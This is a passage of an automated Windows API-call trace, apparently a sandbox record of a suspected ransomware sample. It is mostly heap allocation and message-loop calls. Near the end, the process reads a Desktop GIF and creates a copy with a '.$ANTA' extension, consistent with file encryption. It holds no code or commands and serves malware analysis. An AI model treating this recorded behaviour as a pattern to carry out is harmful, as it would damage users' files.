dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0124.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0124.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0124.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0124.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0124.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0124.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0124.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0124.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0124.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0124.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0124.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0124.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0124.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0124.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0124.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0124.293] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0124.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0124.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0124.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0124.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0124.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0124.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0124.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0124.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0124.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0124.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0124.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0124.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0124.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0124.294] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0124.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0124.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0124.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0124.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0124.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0124.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0124.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0124.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0124.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0124.294] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0124.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0124.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0124.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0124.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0124.294] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0124.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0124.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0124.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0124.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0124.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0124.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0124.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0124.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0124.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0124.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9578 | out: hHeap=0x1780000) returned 1 [0124.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0124.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0124.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0124.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0124.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0124.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0124.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0124.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0124.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0124.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0124.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0124.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0124.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0124.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0124.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0124.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0124.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0124.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0124.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0124.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0124.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0124.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0124.295] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0124.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0124.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0124.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0124.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0124.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0124.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0124.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0124.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0124.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0124.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0124.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0124.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0124.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0124.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0124.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0124.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0124.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0124.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0124.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0124.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0124.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0124.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0124.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0124.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0124.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0124.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0124.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0124.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0124.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0124.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0124.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0124.297] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 1 [0124.297] TranslateMessage (lpMsg=0x144f2dc) returned 0 [0124.297] DispatchMessageW (lpMsg=0x144f2dc) returned 0x0 [0124.297] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0124.297] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0124.297] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0124.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9128 [0124.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0124.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9128 | out: hHeap=0x1780000) returned 1 [0124.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0124.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0124.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0124.297] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0124.297] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0124.297] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0124.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0124.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0124.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0124.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0124.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0124.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0124.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0124.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0124.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0124.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb450 [0124.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0124.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0124.298] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\MDF9dFhi.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\mdf9dfhi.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0124.298] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0124.298] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0124.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0124.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0124.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0124.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0124.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0124.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0124.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0124.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0124.299] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0124.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0124.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0124.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0124.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0124.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0124.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0124.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0124.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0124.299] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0124.299] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0124.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0124.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0124.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0124.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0124.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0124.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0124.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0124.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0124.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0124.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0124.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0124.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0124.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0124.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0124.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0124.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0124.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0124.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0124.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0124.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0124.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0124.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0124.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0124.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0124.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0124.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0124.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392420 [0124.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0124.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0124.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0124.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392490 [0124.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0124.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392260 [0124.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0124.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0124.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0124.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0124.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392420 | out: hHeap=0x1780000) returned 1 [0124.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0124.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392490 | out: hHeap=0x1780000) returned 1 [0124.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0124.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0124.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0124.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0124.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0124.301] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0124.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0124.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0124.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392260 | out: hHeap=0x1780000) returned 1 [0124.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0124.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0124.301] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0124.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0124.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0124.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0124.301] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0124.301] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\MDF9dFhi.gif.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\mdf9dfhi.gif.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0124.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0124.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0124.349] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0124.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0124.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0124.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0124.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0124.349] HeapFree (in: 